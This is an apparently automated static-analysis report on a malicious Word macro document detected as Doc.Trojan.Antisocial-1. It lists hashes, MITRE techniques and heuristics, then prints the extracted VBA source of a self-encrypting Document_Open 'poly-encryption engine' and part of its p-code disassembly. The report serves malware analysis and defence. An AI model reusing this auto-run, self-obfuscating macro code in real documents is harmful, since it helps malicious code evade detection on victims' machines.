Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9cd72412f5f3ae7d…

MALICIOUS

Office (OLE)

28.5 KB Created: 2000-04-08 00:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b902dfc387245c9a194e8a93004b6b26 SHA-1: 6c19984704069beb270abf480f2e573146fbc6ee SHA-256: 9cd72412f5f3ae7d459d0d1ba540895296566def7922b332bef018640550e61c
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros. The 'Document_Open' macro is present, which is a common technique for executing malicious code upon opening the document. The script employs a custom poly-encryption engine, suggesting an attempt to evade detection. The primary function of the script appears to be obfuscating its own code and preparing for further execution, likely involving a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Antisocial-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antisocial-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4892 bytes
SHA-256: 1cc9ae4e7d0e32a5189b29ef941f261f9c3f943f54813a8572ac6b6fbfd3343e
Detection
ClamAV: Doc.Trojan.Antisocial-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul 1"
'
'=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'          AntiSocial Poly-Encryption Engine v.1.0
'By Lys Kovick For The Alcoholic Anarchists of America (AAA)
'=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'

Private Sub Document_Open()
For V1 = 17 To 28 '//Adjust V1 For Line Changes!
V2 = Null
V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
V4 = Asc((Mid(V3, 2, 1)))
V5 = V4 Xor 39
For V6 = 3 To Len(V3)
V7 = Asc(Mid(V3, V6, 1)) Xor V5
V2 = V2 & Chr(V7)
Next V6
V8 = V2
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V8
Next V1
Call VM
End Sub
Private Sub VM()
For V1 = 17 To 28 '//Adjust V1 For Line Changes!
V2 = Null
V3 = "'" & (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
V4 = Int(Rnd() * 8) + 1
For V5 = 1 To Len(V3)
V6 = Asc(Mid(V3, V5, 1)) Xor V4
V2 = V2 & Chr(V6)
Next V5
V7 = V2
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, "'" & V7
Next V1
'//Put Infection Routine Here...
End Sub

' Processing file: /opt/analyzer/scan_staging/4b6d7c8c4bc04dc683c1052cfd57285c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Modul 1 - 2779 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0000 ""
' Line #1:
' 	QuoteRem 0x0000 0x003B "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
' Line #2:
' 	QuoteRem 0x0000 0x0031 "          AntiSocial Poly-Encryption Engine v.1.0"
' Line #3:
' 	QuoteRem 0x0000 0x003B "By Lys Kovick For The Alcoholic Anarchists of America (AAA)"
' Line #4:
' 	QuoteRem 0x0000 0x003B "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
' Line #5:
' 	QuoteRem 0x0000 0x0000 ""
' Line #6:
' Line #7:
' 	FuncDefn (Private Sub Document_Open())
' Line #8:
' 	StartForVariable 
' 	Ld V1 
' 	EndForVariable 
' 	LitDI2 0x0011 
' 	LitDI2 0x001C 
' 	For 
' 	QuoteRem 0x0012 0x001D "//Adjust V1 For Line Changes!"
' Line #9:
' 	LitVarSpecial (Null)
' 	St V2 
' Line #10:
' 	Ld V1 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St V3 
' Line #11:
' 	Ld V3 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	ArgsLd Asc 0x0001 
' 	St V4 
' Line #12:
' 	Ld V4 
' 	LitDI2 0x0027 
' 	Xor 
' 	St V5 
' Line #13:
' 	StartForVariable 
' 	Ld V6 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld V3 
' 	FnLen 
' 	For 
' Line #14:
' 	Ld V3 
' 	Ld V6 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld V5 
' 	Xor 
' 	St V7 
' Line #15:
' 	Ld V2 
' 	Ld V7 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St V2 
' Line #16:
' 	StartForVariable 
' 	Ld V6 
' 	EndForVariable 
' 	NextVar 
' Line #17:
' 	Ld V2 
' 	St V8 
' Line #18:
' 	Ld V1 
' 	Ld V8 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #19:
' 	StartForVariable 
' 	Ld V1 
' 	EndForVariable 
' 	NextVar 
' Line #20:
' 	ArgsCall (Call) VM 0x0000 
' Line #21:
' 	EndSub 
' Line #22:
' 	FuncDefn (Private Sub VM())
' Line #23:
' 	StartForVariable 
' 	Ld V1 
' 	EndForVariable 
' 	LitDI2 0x0011 
' 	LitDI2 0x001C 
' 	For 
' 	QuoteRem 0x0012 0x001D "//Adjust V1 For Line Changes!"
' Line #24:
' 	LitVarSpecial (Null)
' 	St V2 
' Line #25:
' 	LitStr 0x0001 "'"
' 	Ld V1 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	Concat 
' 	St V3 
' Line #26:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x0008 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St V4 
' Line #27:
'
... (truncated)